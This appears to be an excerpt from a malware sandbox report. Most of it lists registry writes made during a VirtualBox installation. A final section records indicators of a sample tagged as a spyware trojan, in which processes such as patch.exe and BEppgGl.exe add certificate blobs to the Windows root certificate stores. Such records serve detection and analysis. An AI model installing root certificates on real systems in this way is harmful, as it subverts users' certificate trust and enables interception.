Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{70401EEF-C8E9-466B-9660-45CB3E9979E4}\ = "IExtPackManager"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B31C4052-7BDC-11E9-8BC2-8FFDB8B19219}\ = "IRangedIntegerFormValue"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{DD3E2654-A161-41F1-B583-4892F4A9D5D5}\NumMethods\ = "13"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9622225A-5409-414B-BD16-77DF7BA3451E}\NumMethods\ = "25"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{69BFB134-80F6-4266-8E20-16371F68FA25}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D05C91E2-3E8A-11E9-8082-DB8AE479EF87}\NumMethods\ = "16"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{C365FB7B-4430-499F-92C8-8BED814A567A}\TypeLib\Version = "1.3"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{1E775EA3-9070-4F9C-B0D5-53054496DBE0}	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{11BE93C7-A862-4DC9-8C89-BF4BA74A886A}\ = "IMediumFormat"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{3E14C189-4A75-437E-B0BB-7E7C90D0DF2A}\NumMethods\ = "88"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{C1BCC6D5-7966-481D-AB0B-D0ED73E28135}\TypeLib	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\VirtualBox.VirtualBoxSDS\CurVer\ = "VirtualBox.VirtualBoxSDS.1"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\progId_VirtualBox.Shell.ovf\DefaultIcon\ = "\"C:\\Program Files\\Oracle\\VirtualBox\\VBoxRes.dll\",-301"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{0B3CDEB2-808E-11E9-B773-133D9330F849}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{A443DA5B-AA82-4720-BC84-BD097B2B13B8}\ProxyStubClsid32	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{89A63ACE-0C65-11EA-AD23-0FF257C71A7F}	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{E062A915-3CF5-4C0A-BC90-9B8D4CC94D89}\ProxyStubClsid32	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{46735DE7-F4C4-4020-A185-0D2881BCFA8B}\ = "IDHCPGlobalConfig"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{BE8A0EB5-F4F4-4DD0-9D30-C89B873247EC}\TypeLib	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{AD47AD09-787B-44AB-B343-A082A3F2DFB1}\ProxyStubClsid32	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{1D89E2B3-C6EA-45B6-9D43-DC6F70CC9F02}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00F4A8DC-0002-4B81-0077-1DCB004571BA}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{8D095CB0-0126-43E0-B05D-326E74ABB356}\ProxyStubClsid32	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{9622225A-5409-414B-BD16-77DF7BA3451E}\ProxyStubClsid32	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6B2F98F8-9641-4397-854A-040439D0114B}\NumMethods\ = "17"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{6DC83C2C-81A9-4005-9D52-FC45A78BF3F5}\NumMethods	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{D05C91E2-3E8A-11E9-8082-DB8AE479EF87}\NumMethods	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{39B4E759-1EC0-4C0F-857F-FBE2A737A256}\NumMethods\ = "16"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5748F794-48DF-438D-85EB-98FFD70D18C9}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{48C7F4C0-C9D6-4742-957C-A6FD52E8C4AE}\NumMethods\ = "16"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{DDCA7247-BF98-47FB-AB2F-B5177533F493}\ProxyStubClsid32	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{FB220201-2FD3-47E2-A5DC-2C2431D833CC}\TypeLib\Version = "1.3"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D7B98D2B-30E8-447E-99CB-E31BECAE6AE4}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{DEDFB5D9-4C1B-EDF7-FDF3-C1BE6827DC28}\TypeLib\Version = "1.3"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{13A11514-402E-022E-6180-C3944DE3F9C8}	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{4132147B-42F8-CD96-7570-6A8800E3342C}\ProxyStubClsid32	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{CAC21692-7997-4595-A731-3A509DB604E5}\NumMethods	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{E8F79A21-1207-4179-94CF-CA250036308F}\ = "IGuestFileOffsetChangedEvent"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{455F8C45-44A0-A470-BA20-27890B96DBA9}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{ABE94809-2E88-4436-83D7-50F3E64D0503}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DD3FC71D-26C0-4FE1-BF6F-67F633265BBA}\VersionIndependentProgID\ = "VirtualBox.VirtualBoxClient"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{00AE6AF4-00A7-4104-0009-49BC00B2DA80}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vmdk\ = "progId_VirtualBox.Shell.vmdk"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{AD47AD09-787B-44AB-B343-A082A3F2DFB1}\NumMethods	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D2937A8E-CB8D-4382-90BA-B7DA78A74573}\NumMethods\ = "19"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{48C7F4C0-C9D6-4742-957C-A6FD52E8C4AE}\NumMethods	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{C365FB7B-4430-499F-92C8-8BED814A567A}\ProxyStubClsid32	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{41304F1B-7E72-4F34-B8F6-682785620C57}\NumMethods	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{A06FD66A-3188-4C8C-8756-1395E8CB691C}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{22363CFC-07DA-41EC-AC4A-3DD99DB35594}\TypeLib\Version = "1.3"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{678FBD9A-93AF-42A7-7F13-79AD6EF1A18D}\ProxyStubClsid32	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{88394258-7006-40D4-B339-472EE3801844}\NumMethods\ = "13"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{D23A9CA3-42DA-C94B-8AEC-21968E08355D}\TypeLib	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.vbox-extpack\ = "progId_VirtualBox.Shell.vbox-extpack"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{CADEF0A2-A1A9-4AC2-8E80-C049AF69DAC8}\NumMethods	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{D5ABC823-04D0-4DB6-8D66-DC2F033120E1}\TypeLib\ = "{D7569351-1750-46F0-936E-BD127D5BC264}"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{4F4ADCF6-3E87-11E9-8AF2-576E84223953}\NumMethods	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{F05D7E60-1BCF-4218-9807-04E036CC70F1}\TypeLib	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{6CC49055-DAD4-4496-85CF-3F76BCB3B5FA}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\Interface\{B79DE686-EABD-4FA6-960A-F1756C99EA1C}\ProxyStubClsid32\ = "{0BB3B78C-1807-4249-5BA5-EA42D66AF0BF}"	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Wow6432Node\Interface\{B14290AD-CD54-400C-B858-797BCB82570E}\ProxyStubClsid32	msiexec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{24EEF068-C380-4510-BC7C-19314A7352F1}\NumMethods	msiexec.exe

Modifies system certificate store 2 TTPs 12 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

Processes:

csrss.exepatch.exeBEppgGl.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	BEppgGl.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	BEppgGl.exe
